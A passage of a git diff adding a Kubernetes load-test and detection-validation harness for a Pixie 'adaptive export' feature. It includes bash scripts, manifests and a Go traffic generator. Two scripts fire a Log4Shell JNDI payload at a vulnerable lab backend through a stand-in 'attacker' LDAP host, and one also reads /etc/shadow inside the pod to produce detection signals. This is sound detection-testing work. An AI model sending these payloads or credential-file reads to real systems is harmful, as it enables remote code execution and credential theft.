+ sleep "${WARMUP_SETTLE_S:-6}"
+}
+
+# wait_attrib [timeout_s] — poll adaptive_attribution
+# FINAL until it reaches (AE's 250ms poll + write can lag a few seconds;
+# a fixed sleep occasionally under-waited). Echoes the final observed count.
+wait_attrib(){
+ local node="$1" pod="$2" want="$3" to="${4:-20}" n=0
+ for _ in $(seq 1 "$to"); do
+ n="$(attrib_count "$node" "$pod")"
+ [[ "${n:-0}" -ge "$want" ]] && break
+ sleep 1
+ done
+ echo "${n:-0}"
+}
+
+# svc_ip — ClusterIP of an aeload service (literal IP for the generator).
+svc_ip(){ k -n "$AELOAD_NS" get svc "$1" -o jsonpath='{.spec.clusterIP}'; }
+
+# apply_sinks — bring up the shared aeload ns + http-sink + pg-sink (idempotent).
+apply_sinks(){
+ [[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set"
+ sed "s#__IMAGE__#${AELOAD_IMAGE}#g" "$K8S_DIR/00-sinks.yaml" | k apply -f -
+ k -n "$AELOAD_NS" rollout status deploy/http-sink --timeout=120s
+ k -n "$AELOAD_NS" rollout status deploy/pg-sink --timeout=120s
+}
+
+# fire_gen — create a gen pod, wait for it
+# to fire, echo its one-line JSON manifest. Leaves the pod RUNNING (held).
+fire_gen(){
+ local name="$1" hn="$2" dn="$3" pn="$4"
+ local hip pip
+ hip="$(svc_ip http-sink)"; pip="$(svc_ip pg-sink)"
+ [[ -n "$hip" && -n "$pip" ]] || die "could not resolve sink ClusterIPs"
+ # GEN_SETTLE_MS: pre-band warm-up so Pixie/Stirling attaches BEFORE the exact
+ # band (exact-count tests). GEN_SUSTAIN_SEC: continuous trickle AFTER the band
+ # (sustained "keep writing until t_end" RCA). Defaults suit exact-count runs.
+ sed -e "s#__NAME__#${name}#g" -e "s#__IMAGE__#${AELOAD_IMAGE}#g" \
+ -e "s#__HTTP_ADDR__#${hip}:8080#g" -e "s#__PG_ADDR__#${pip}:5432#g" \
+ -e "s#__HTTP_N__#${hn}#g" -e "s#__DNS_N__#${dn}#g" -e "s#__PGSQL_N__#${pn}#g" \
+ -e "s#__SETTLE_PRE_MS__#${GEN_SETTLE_MS:-30000}#g" -e "s#__SUSTAIN_SEC__#${GEN_SUSTAIN_SEC:-0}#g" \
+ "$K8S_DIR/gen-pod.tmpl.yaml" | k apply -f - >&2
+ # Wait for the FIRED sentinel + grab the manifest line (allow for the warm-up).
+ local mani=""
+ for _ in $(seq 1 90); do
+ if k -n "$AELOAD_NS" logs "$name" 2>/dev/null | grep -q AELOAD_FIRED; then
+ mani="$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null | grep AELOAD_MANIFEST | tail -1 | sed 's/^AELOAD_MANIFEST //')"
+ break
+ fi
+ sleep 1
+ done
+ [[ -n "$mani" ]] || die "gen $name never fired (logs:)\n$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null | tail -20)"
+ echo "$mani"
+}
+del_gen(){ k -n "$AELOAD_NS" delete pod "$1" --grace-period=2 --wait=false >/dev/null 2>&1 || true; }
+
+# jget — tiny JSON field reader (numbers/strings) via python3.
+jget(){ python3 -c 'import json,sys;print(json.load(sys.stdin)[sys.argv[1]])' "$2" <<<"$1"; }
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh
new file mode 100755
index 00000000000..7cd7ba7b619
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh
@@ -0,0 +1,83 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# log4shell_fire.sh — generate the bob log4j-chain log4shell DETECTION SIGNAL reliably,
+# with clean restart. (Anthropic Cyber Verification context: this is detection-signal
+# generation for validating the kubescape→DX→AE chain, not offensive use.)
+#
+# Addresses bob#140 (the log4shell signal is STATEFUL/unreliable on a re-fired/restarted
+# backend — JVM negative-DNS cache + first-eval timing). Reliability is achieved BY
+# CONSTRUCTION: each attempt uses a fresh-JVM backend + the WORKING resolvable FQDN, then
+# VERIFIES the actual LDAP egress (backend → attacker:1389 in forensic_db.conn_stats) and
+# RETRIES until confirmed — the "validity gate". It never assumes the signal was generated.
+#
+# Hard-won facts baked in (see memory log4j-network-detection-chain / bob#140):
+# - WORKING JNDI host = attacker..svc.cluster.local (RESOLVABLE Service FQDN).
+# A bare/partial name (e.g. attacker-ns.svc) NXDOMAINs → DNS event dropped → nothing fires.
+# - attacker (LDAP server) MUST be up BEFORE backend (#140 attacker-before-backend).
+# - delete the backend pod (not just rollout) → fresh JVM → clears the negative-DNS cache.
+#
+# Run NODE-SIDE on the rig (kubectl reaches the cluster directly). Idempotent.
+# Env knobs: NS, ANS, RESTART(=1), MAXTRIES(=5), FIRES(=15).
+set -uo pipefail
+NS=${NS:-log4j-poc}
+ANS=${ANS:-attacker-ns}
+JNDI_HOST=${JNDI_HOST:-attacker.$ANS.svc.cluster.local}
+JNDI='${jndi:ldap://'"$JNDI_HOST"':1389/Payload}'
+RESTART=${RESTART:-1}
+MAXTRIES=${MAXTRIES:-5}
+FIRES=${FIRES:-15}
+CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+ldap_count(){ chq "SELECT count() FROM forensic_db.conn_stats WHERE remote_port=1389 AND time_ > now()-INTERVAL 5 MINUTE"; }
+
+# 0. Attacker/LDAP server up FIRST (#140).
+kubectl -n "$ANS" rollout status deploy/attacker --timeout=60s >/dev/null 2>&1 \
+ || { echo "FATAL: attacker (LDAP :1389) not ready — bring it up before backend"; exit 1; }
+echo "attacker ready (LDAP :1389) — #140 attacker-before-backend satisfied; JNDI host=$JNDI_HOST"
+
+for try in $(seq 1 "$MAXTRIES"); do
+ if [ "$RESTART" = 1 ]; then
+ echo "[try $try] delete backend pod → fresh JVM (clears negative-DNS cache)"
+ kubectl -n "$NS" delete pod -l app=backend --wait=true >/dev/null 2>&1
+ kubectl -n "$NS" rollout status deploy/backend --timeout=120s >/dev/null 2>&1
+ sleep 12 # app listening + Pixie re-attach
+ fi
+ BIP=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null)
+ BPORT=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+ before=$(ldap_count)
+ echo "[try $try] fire JNDI at backend $BIP:$BPORT (x$FIRES)"
+ for _ in $(seq 1 "$FIRES"); do
+ kubectl -n "$ANS" exec deploy/attacker -- curl -s -m5 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+ sleep 0.5
+ done
+ sleep 40 # settle: LDAP egress lands in conn_stats
+ after=$(ldap_count)
+ echo "[try $try] backend->:1389 LDAP egress (last5m): before=${before:-?} after=${after:-?}"
+ if [ "${after:-0}" -gt "${before:-0}" ]; then
+ echo "SIGNAL CONFIRMED — backend->:1389 LDAP egress generated on try $try (host=$JNDI_HOST)."
+ echo "Downstream now has signal: R0005 (DNS) + ldap-egress for DX log4shell-rce-exfil detection."
+ exit 0
+ fi
+ echo "[try $try] NOT fired (literal \${jndi} in backend log = log4j didn't expand) — retrying with fresh JVM"
+ RESTART=1
+done
+echo "FAILED to confirm LDAP egress after $MAXTRIES tries."
+echo "Check: backend app log shows 'ua=\${jndi:...}' LITERAL (not expanded) ⇒ log4j lookups not evaluating;"
+echo "verify backend is the *-vulnerable image + log4j evaluates message lookups (bob#140 validity gate)."
+exit 2
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh
new file mode 100755
index 00000000000..130ae8ec599
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh
@@ -0,0 +1,67 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# nfr.sh — AE non-functional benchmark: throughput, AE+dx mem under load, and
+# END-TO-END no-data-loss proof (broker read_count == AE wrote_count == ACTUAL CH rows).
+# Two phases: passthrough (firehose, throughput stress) then streaming (DX). Node-side on rig.
+set -uo pipefail
+NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0
+DUR=${DUR:-150}
+OUT=/tmp/nfr.txt; : > "$OUT"
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; }
+BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}'); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}')
+fire(){ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+ local BP; BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null|awk '/^backend/{print $1;exit}')
+ [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; cat /etc/shadow 2>/dev/null|head -1; getent hosts attacker.attacker-ns.svc.cluster.local >/dev/null 2>&1' >/dev/null 2>&1 || true; }
+memsum(){ kubectl -n "$1" top pod -l "$2" --no-headers 2>/dev/null | awk '{gsub(/Mi/,"",$3); s+=$3} END{print s+0}'; }
+truncate_all(){ local t; for t in http_events dns_events conn_stats pgsql_events ae_reconcile adaptive_attribution kubescape_logs; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; }
+setarm(){ kubectl -n pl set env ds/adaptive-export "$@" ADAPTIVE_RECONCILE=true >/dev/null 2>&1; kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1; }
+
+run_phase(){ local name=$1; shift
+ say "=== PHASE $name : $* ==="
+ setarm "$@"; truncate_all; say " truncated; $name load window ${DUR}s"
+ local t0 aemax=0 dxmax=0 pemmax=0 sm=0
+ t0=$(date +%s)
+ while [ $(( $(date +%s) - t0 )) -lt "$DUR" ]; do
+ fire
+ local ae dx pem; ae=$(memsum pl 'name=adaptive-export'); dx=$(memsum honey 'app=dx-daemon'); pem=$(memsum pl 'name=vizier-pem')
+ [ "${ae:-0}" -gt "$aemax" ] && aemax=$ae; [ "${dx:-0}" -gt "$dxmax" ] && dxmax=$dx; [ "${pem:-0}" -gt "$pemmax" ] && pemmax=$pem
+ sm=$((sm+1)); sleep 12
+ done
+ local el; el=$(( $(date +%s) - t0 )); say " window done ${el}s ($sm samples); flush 20s"; sleep 20
+ say " [MEM peak] AE(2pods)=${aemax}Mi dx-daemon=${dxmax}Mi PEM=${pemmax}Mi"
+ say " [NO-LOSS PROOF] broker_read == AE_wrote == CH_actual_rows:"
+ local t rd wr ch
+ for t in http_events dns_events conn_stats; do
+ rd=$(chq "SELECT sum(read_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'"); rd=${rd:-0}
+ wr=$(chq "SELECT sum(wrote_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'"); wr=${wr:-0}
+ ch=$(chq "SELECT count() FROM forensic_db.$t"); ch=${ch:-0}
+ say " $t: read=$rd wrote=$wr CH_rows=$ch $([ "$wr" = "$ch" ] && echo 'MATCH' || echo '*MISMATCH*')$([ "$rd" = "$wr" ] && echo '/read==wrote' || echo '/READ!=WROTE')"
+ done
+ say " [BYTES] per-table rows + compressed bytes (on-disk data volume):"
+ chq "SELECT ' '||table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active AND table IN ('http_events','dns_events','conn_stats') GROUP BY table ORDER BY table FORMAT TSV" | tee -a "$OUT"
+ local tot; tot=$(chq "SELECT count() FROM forensic_db.http_events"); tot=$((tot + $(chq "SELECT count() FROM forensic_db.dns_events") + $(chq "SELECT count() FROM forensic_db.conn_stats")))
+ say " [THROUGHPUT] $name CH rows=$tot over ${el}s = $(awk -v r=$tot -v e=$el 'BEGIN{printf "%.1f", r/e}') rows/s"
+ say " [steered] $(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"
+}
+
+say "##### AE NFR BENCHMARK START #####"
+run_phase ALL-passthrough ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60
+run_phase DX-streaming ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60
+say "##### NFR DONE #####"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/run.sh b/src/e2e_test/adaptive_export_loadtest/harness/run.sh
new file mode 100755
index 00000000000..f8403e4fdbb
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/run.sh
@@ -0,0 +1,57 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# run.sh — drive the full AE fixture-isolation suite on a live rig and produce
+# the reproducibility evidence (per-experiment CSV + stats verdicts).
+#
+# Prereqs:
+# KUBECONFIG = tailscale-direct kubeconfig (make kubeconfig PG=)
+# AELOAD_IMAGE = ttl.sh/aeload-:24h (built on the PG dev-machine)
+# AE in single-shot load-test mode (this script runs ae_config.sh).
+#
+# Usage: KUBECONFIG=... AELOAD_IMAGE=... EVID=/path ./run.sh
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+
+[[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set"
+EVID="${EVID:-/home/croedig/biz/PoC/log4j/evidence/datavolume/aeload_$(date -u +%Y%m%dT%H%M%SZ)}"
+mkdir -p "$EVID"
+REPS_CTRL="${REPS_CTRL:-100}"
+REPS_E5="${REPS_E5:-100}"
+REPS_E6="${REPS_E6:-10}"
+log "evidence dir: $EVID"
+
+# 1) AE into single-shot load-test mode (idempotent).
+bash "$HERE/ae_config.sh"
+
+# 2) Control-plane experiments (no Pixie/gen needed).
+for e in E1 E2 E3 E4; do
+ log "=== control $e (reps=$REPS_CTRL) ==="
+ EXP="$e" REPS="$REPS_CTRL" OUT="$EVID/${e}.csv" bash "$HERE/exp_control.sh"
+done
+log "=== control E6 idempotency (reps=$REPS_E6) ==="
+EXP=E6 REPS="$REPS_E6" OUT="$EVID/E6.csv" bash "$HERE/exp_control.sh"
+
+# 3) Data-plane experiment (real Pixie capture of the counted band).
+log "=== data-plane E5 (reps=$REPS_E5) ==="
+REPS="$REPS_E5" OUT="$EVID/E5.csv" bash "$HERE/exp_e5.sh"
+
+# 4) Aggregate verdicts.
+log "=== aggregate ==="
+python3 "$HERE/stats.py" "$EVID"/*.csv | tee "$EVID/VERDICT.txt"
+log "DONE -> $EVID"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/stats.py b/src/e2e_test/adaptive_export_loadtest/harness/stats.py
new file mode 100755
index 00000000000..a9b4a6fa59a
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/stats.py
@@ -0,0 +1,89 @@
+#!/usr/bin/env python3
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+"""stats.py — reduce an experiment CSV to a per-metric reproducibility report.
+
+Exact reproducibility ⇔ every measured (`*_act`) metric has a single distinct
+value across all PASS reps (std = 0 / CV = 0). Prints per-metric
+n/distinct/mean/std/CV%/min/max and an overall verdict. No fabrication: it only
+summarizes the rows the harness actually recorded.
+
+Usage: stats.py [ ...]
+"""
+import csv
+import statistics as st
+import sys
+
+
+def num(x):
+ try:
+ return float(x)
+ except (TypeError, ValueError):
+ return None
+
+
+def report(path):
+ with open(path) as f:
+ rows = list(csv.DictReader(f))
+ if not rows:
+ print(f"== {path}: empty ==")
+ return
+ cols = list(rows[0].keys())
+ passcol = "pass" if "pass" in cols else None
+ npass = sum(1 for r in rows if passcol and str(r[passcol]).startswith("PASS"))
+ print(f"== {path} == reps={len(rows)} PASS={npass}/{len(rows)}")
+
+ # Reproducibility metrics = the COUNT columns AE wrote (must be constant
+ # across reps). wm_act is EXCLUDED: it equals each rep's distinct event_time
+ # by design (monotone), validated per-rep as wm_act==wm_exp via the pass flag
+ # — it is not expected to be constant across reps.
+ metrics = [c for c in cols if c.endswith("_act") and c != "wm_act"]
+ metrics = list(dict.fromkeys(metrics)) # dedupe, keep order
+ repro_ok = True
+ for c in metrics:
+ vals = [num(r[c]) for r in rows if (not passcol or str(r[passcol]).startswith("PASS"))]
+ vals = [v for v in vals if v is not None]
+ if not vals:
+ print(f" {c:16s} (no numeric PASS values)")
+ continue
+ distinct = sorted(set(vals))
+ mean = st.fmean(vals)
+ sd = st.pstdev(vals) if len(vals) > 1 else 0.0
+ cv = (sd / mean * 100) if mean else 0.0
+ flag = "EXACT" if len(distinct) == 1 else f"VARIES({len(distinct)})"
+ if len(distinct) != 1:
+ repro_ok = False
+ print(f" {c:16s} n={len(vals):4d} distinct={len(distinct):3d} "
+ f"mean={mean:.3f} std={sd:.3f} cv={cv:.4f}% "
+ f"min={min(vals):.0f} max={max(vals):.0f} {flag}")
+ verdict = ("EXACTLY REPRODUCIBLE (all metrics std=0)" if repro_ok
+ else "NOT exactly reproducible (see VARIES above)")
+ print(f" VERDICT: {verdict}")
+ print()
+
+
+def main():
+ if len(sys.argv) < 2:
+ print(__doc__)
+ sys.exit(2)
+ for p in sys.argv[1:]:
+ report(p)
+
+
+if __name__ == "__main__":
+ main()
diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml
new file mode 100644
index 00000000000..7aca396ff60
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml
@@ -0,0 +1,82 @@
+---
+# Shared, long-lived data-plane sinks for the AE load-tests. These are the PEER
+# side of cleanloadgen's traffic; AE filters to the client (gen) pod so the
+# sinks' own rows are excluded — but they carry NO probes/sidecars regardless so
+# the namespace stays free of uncounted traffic.
+#
+# IMAGE is substituted by the harness (ttl.sh/aeload-:24h, built on the PG
+# dev-machine). pg-sink uses the public postgres image.
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: aeload
+ labels:
+ app.kubernetes.io/part-of: ae-loadtest
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: http-sink
+ namespace: aeload
+spec:
+ replicas: 1
+ selector:
+ matchLabels: {app: http-sink}
+ template:
+ metadata:
+ labels: {app: http-sink}
+ spec:
+ # No probes anywhere: probe traffic would be captured by Pixie.
+ containers:
+ - name: httpsink
+ image: __IMAGE__
+ command: ["/usr/local/bin/httpsink"]
+ env:
+ - {name: LISTEN_ADDR, value: ":8080"}
+ ports:
+ - containerPort: 8080
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: http-sink
+ namespace: aeload
+spec:
+ selector: {app: http-sink}
+ ports:
+ - port: 8080
+ targetPort: 8080
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: pg-sink
+ namespace: aeload
+spec:
+ replicas: 1
+ selector:
+ matchLabels: {app: pg-sink}
+ template:
+ metadata:
+ labels: {app: pg-sink}
+ spec:
+ containers:
+ - name: postgres
+ image: postgres:16-alpine
+ # trust auth keeps the gen simple; no probes.
+ env:
+ - {name: POSTGRES_PASSWORD, value: postgres}
+ - {name: POSTGRES_HOST_AUTH_METHOD, value: trust}
+ ports:
+ - containerPort: 5432
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: pg-sink
+ namespace: aeload
+spec:
+ selector: {app: pg-sink}
+ ports:
+ - port: 5432
+ targetPort: 5432
diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml
new file mode 100644
index 00000000000..6c02ee557c1
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml
@@ -0,0 +1,38 @@
+---
+# Per-rep generator pod. The harness renders one of these per repetition with a
+# UNIQUE name (gen--) — that uniqueness is the data-plane isolation:
+# AE's df.pod filter pulls only this rep's traffic even if windows overlap.
+#
+# Substituted by the harness: __NAME__, __IMAGE__, __HTTP_ADDR__ (sink ClusterIP
+# :8080 as a literal IP so it adds no DNS), __PG_ADDR__, __HTTP_N__, __DNS_N__,
+# __PGSQL_N__. The pod FIRES once then HOLDS (sleeps on SIGTERM) so its upid
+# stays resolvable while AE queries the window; the harness deletes it after the
+# rep is measured.
+apiVersion: v1
+kind: Pod
+metadata:
+ name: __NAME__
+ namespace: aeload
+ labels:
+ app: aeload-gen
+spec:
+ restartPolicy: Never
+ containers:
+ - name: gen
+ image: __IMAGE__
+ command: ["/usr/local/bin/cleanloadgen"]
+ env:
+ - {name: HTTP_ADDR, value: "__HTTP_ADDR__"}
+ - {name: HTTP_PATH, value: "/ping"}
+ - {name: HTTP_N, value: "__HTTP_N__"}
+ - {name: DNS_N, value: "__DNS_N__"}
+ - {name: DNS_BASE, value: "t-%d.aeload.svc.cluster.local."}
+ - {name: PG_ADDR, value: "__PG_ADDR__"}
+ - {name: PGSQL_N, value: "__PGSQL_N__"}
+ - {name: PG_USER, value: "postgres"}
+ - {name: PG_PASSWORD, value: "postgres"}
+ - {name: SETTLE_PRE_MS, value: "__SETTLE_PRE_MS__"}
+ - {name: SUSTAIN_SEC, value: "__SUSTAIN_SEC__"}
+ - {name: POD_NAME, valueFrom: {fieldRef: {fieldPath: metadata.name}}}
+ - {name: POD_NAMESPACE, valueFrom: {fieldRef: {fieldPath: metadata.namespace}}}
+ - {name: NODE_NAME, valueFrom: {fieldRef: {fieldPath: spec.nodeName}}}
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile
new file mode 100644
index 00000000000..fd186588a19
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile
@@ -0,0 +1,18 @@
+# Build both load-test binaries (cleanloadgen + httpsink) into one small image.
+# Built on the PG dev-machine (native amd64 docker), never on the agent VM
+# (ARM, no bazel/heavy-build) — same path used for the dx images.
+FROM golang:1.22-bookworm AS build
+WORKDIR /src
+# -mod=mod lets the build resolve + record go.sum for the single lib/pq dep
+# without a pre-committed go.sum (keeps the tool tree minimal).
+ENV GOFLAGS=-mod=mod CGO_ENABLED=0
+COPY go.mod ./
+COPY cmd ./cmd
+RUN go build -trimpath -ldflags="-s -w" -o /out/cleanloadgen ./cmd/cleanloadgen
+RUN go build -trimpath -ldflags="-s -w" -o /out/httpsink ./cmd/httpsink
+
+FROM gcr.io/distroless/static-debian12:nonroot
+COPY --from=build /out/cleanloadgen /usr/local/bin/cleanloadgen
+COPY --from=build /out/httpsink /usr/local/bin/httpsink
+# Default to the sink; the generator pod overrides command to cleanloadgen.
+ENTRYPOINT ["/usr/local/bin/httpsink"]
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go
new file mode 100644
index 00000000000..4c506eb4a31
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go
@@ -0,0 +1,255 @@
+// cleanloadgen — a deterministic, "clean-cut" traffic generator for the
+// adaptive_export (AE) live data-plane load-tests.
+//
+// It is the OPPOSITE of a fuzzer: its only job is to emit an EXACTLY known
+// number of HTTP, DNS and PostgreSQL operations against fixed sinks, inside a
+// single sealed time band [B0,B1], and emit nothing else over the network. The
+// counts it prints are the ground-truth oracle the AE assertions compare
+// forensic_db row deltas against — no fabricated numbers anywhere.
+//
+// Determinism rules baked in (see the load-test design notes):
+// - HTTP: one NEW TCP connection per request (DisableKeepAlives) so both
+// http_events AND conn_stats counts are a function of HTTP_N. Every request
+// MUST return 2xx or the process exits non-zero (the rep is discarded, not
+// silently mis-counted).
+// - DNS: exactly ONE A-query per name via LookupNetIP(ip4) on a FQDN with a
+// trailing dot (suppresses /etc/resolv.conf search-domain expansion under
+// ndots:5) → dns_events == DNS_N. Names need not resolve; an NXDOMAIN is
+// still one captured query/response, so NXDOMAIN is not treated as failure.
+// - PGSQL: a single connection runs PGSQL_N separate `SELECT 1` statements →
+// pgsql_events == PGSQL_N.
+// - HTTP/PG endpoints are passed as IP:port (HTTP_ADDR / PG_ADDR), never DNS
+// names, so resolving the sinks themselves cannot pollute the DNS count.
+//
+// After firing, the process prints a one-line JSON manifest, emits the sentinel
+// AELOAD_FIRED, then HOLDS (sleeps until SIGTERM). Holding keeps the pod — and
+// therefore its upid — alive so Pixie's upid_to_pod_name can still resolve it
+// when AE queries the window AFTER the kubescape fixture is injected. The
+// harness deletes the pod once the rep is measured.
+package main
+
+import (
+ "context"
+ "database/sql"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "io"
+ "net"
+ "net/http"
+ "os"
+ "os/signal"
+ "strconv"
+ "strings"
+ "syscall"
+ "time"
+
+ _ "github.com/lib/pq"
+)
+
+type manifest struct {
+ HTTP int `json:"http"` // http_events expected
+ DNS int `json:"dns"` // dns_events expected (A queries)
+ PGSQL int `json:"pgsql"` // pgsql_events expected
+ ConnTCPEst int `json:"conn_tcp_est"` // conn_stats TCP rows expected (tolerance gate)
+ B0 int64 `json:"b0"` // band start, unix nanos (node clock == Pixie time_)
+ B1 int64 `json:"b1"` // band end, unix nanos
+ B0ISO string `json:"b0_iso"`
+ B1ISO string `json:"b1_iso"`
+ Pod string `json:"pod"`
+ Namespace string `json:"namespace"`
+ Node string `json:"node"`
+}
+
+func envInt(k string, def int) int {
+ if v := os.Getenv(k); v != "" {
+ if n, err := strconv.Atoi(v); err == nil {
+ return n
+ }
+ fatalf("env %s=%q is not an integer", k, v)
+ }
+ return def
+}
+
+func envStr(k, def string) string {
+ if v := os.Getenv(k); v != "" {
+ return v
+ }
+ return def
+}
+
+func fatalf(format string, a ...any) {
+ fmt.Fprintf(os.Stderr, "cleanloadgen: "+format+"\n", a...)
+ os.Exit(1)
+}
+
+func mustIPPort(k string) string {
+ v := os.Getenv(k)
+ if v == "" {
+ fatalf("%s is required (IP:port, never a DNS name — see design)", k)
+ }
+ host, _, err := net.SplitHostPort(v)
+ if err != nil {
+ fatalf("%s=%q is not host:port: %v", k, v, err)
+ }
+ if net.ParseIP(host) == nil {
+ fatalf("%s host %q must be a literal IP, not a name, so it cannot add DNS events", k, host)
+ }
+ return v
+}
+
+func main() {
+ var (
+ httpN = envInt("HTTP_N", 100)
+ dnsN = envInt("DNS_N", 100)
+ pgN = envInt("PGSQL_N", 100)
+ httpAddr = mustIPPort("HTTP_ADDR") // e.g. 10.43.0.10:8080
+ httpPath = envStr("HTTP_PATH", "/ping")
+ dnsBase = envStr("DNS_BASE", "t-%d.aeload.svc.cluster.local.") // trailing dot = FQDN
+ settlePre = time.Duration(envInt("SETTLE_PRE_MS", 1500)) * time.Millisecond
+ )
+ // PG is optional (PGSQL_N may be 0 or PG_ADDR unset).
+ pgAddr := os.Getenv("PG_ADDR")
+ if pgN > 0 {
+ pgAddr = mustIPPort("PG_ADDR")
+ }
+
+ // Let the pod's networking settle and the upid register before the band
+ // opens, so no stray startup traffic lands inside [B0,B1].
+ time.Sleep(settlePre)
+
+ b0 := time.Now()
+
+ // ---- HTTP: HTTP_N requests, new connection each ----
+ for i := 0; i < httpN; i++ {
+ // Fresh transport per request guarantees a new TCP connection.
+ tr := &http.Transport{DisableKeepAlives: true}
